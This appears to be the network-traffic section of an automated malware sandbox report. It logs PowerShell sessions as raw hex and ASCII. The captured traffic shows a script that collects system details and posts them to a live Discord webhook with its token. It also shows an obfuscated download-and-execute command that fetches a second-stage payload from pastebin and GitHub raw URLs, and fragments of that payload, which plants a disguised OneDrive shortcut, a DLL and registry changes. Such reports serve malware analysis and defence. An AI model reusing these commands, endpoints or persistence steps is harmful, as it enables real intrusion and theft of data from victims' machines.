                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                              2024-10-15 13:53:27 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                              2024-10-15 13:53:27 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1049711162.159.137.2324437756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:51 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Content-Type: application/json
                                                                              Host: discord.com
                                                                              Content-Length: 294
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:51 UTC294OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 56 45 4e 55 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c 53
                                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** VENUG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FALS
                                                                              2024-10-15 13:53:52 UTC1362INHTTP/1.1 204 No Content
                                                                              Date: Tue, 15 Oct 2024 13:53:52 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              set-cookie: __dcfduid=e939394e8afc11ef9fb26626db264c29; Expires=Sun, 14-Oct-2029 13:53:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                              x-ratelimit-limit: 5
                                                                              x-ratelimit-remaining: 4
                                                                              x-ratelimit-reset: 1729000433
                                                                              x-ratelimit-reset-after: 1
                                                                              via: 1.1 google
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTrRsr4xVDRbM%2BtmmK%2FYb7zoRzOk60MXbQRDs0NC%2BLQZWusvSe%2FqC12dDNnW0h4eOrME6S43T0nvZVsIrNkWNgJLPBQQ2SgDKmZ8uZGe%2BXKpN6gBggB5%2FKxUpy%2F7"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                              Set-Cookie: __sdcfduid=e939394e8afc11ef9fb26626db264c294957aff408cf85f2aac27ecd487ce3abc0608df3f14aa6beb19d6aa21afc0618; Expires=Sun, 14-Oct-2029 13:53:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              Set-Cookie: __cfruid=deb355df837f05f2c11a6e06cbbe06ca80c00ea7-1729000432; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                              2024-10-15 13:53:52 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 56 39 65 56 34 71 78 68 49 69 77 50 64 33 4a 38 64 42 4e 31 45 46 64 34 5f 46 30 59 77 57 44 50 45 61 66 4c 73 43 43 45 6e 67 49 2d 31 37 32 39 30 30 30 34 33 32 31 32 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 33 62 39 65 37 37 65 37 38 65 2d 44 46 57 0d 0a 0d 0a
                                                                              Data Ascii: Set-Cookie: _cfuvid=V9eV4qxhIiwPd3J8dBN1EFd4_F0YwWDPEafLsCCEngI-1729000432120-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304c3b9e77e78e-DFW


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1049713104.20.3.2354432040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:53 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:53 UTC396INHTTP/1.1 200 OK
                                                                              Date: Tue, 15 Oct 2024 13:53:53 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: HIT
                                                                              Age: 83
                                                                              Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304c43ad6a6ba1-DFW
                                                                              2024-10-15 13:53:53 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                              2024-10-15 13:53:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1049715185.199.111.1334432040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:54 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:54 UTC901INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 7508
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:53:54 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdal2120060-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 1
                                                                              X-Timer: S1729000435.685557,VS0,VE1
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              X-Fastly-Request-ID: daf060581f2c7080d42bb66744e0e09ffe9c3cbb
                                                                              Expires: Tue, 15 Oct 2024 13:58:54 GMT
                                                                              Source-Age: 82
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                              2024-10-15 13:53:54 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1049717172.67.19.244435024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:54:00 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:54:01 UTC396INHTTP/1.1 200 OK
                                                                              Date: Tue, 15 Oct 2024 13:54:01 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: HIT
                                                                              Age: 91
                                                                              Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304c747c69475d-DFW
                                                                              2024-10-15 13:54:01 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                              2024-10-15 13:54:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1049719185.199.111.1334435024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:54:02 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:54:02 UTC901INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 7508
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:54:02 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdal2120056-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 1
                                                                              X-Timer: S1729000443.890340,VS0,VE1
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              X-Fastly-Request-ID: e1038e87529da87f6be0cacbd73072e451e0315f
                                                                              Expires: Tue, 15 Oct 2024 13:59:02 GMT
                                                                              Source-Age: 90
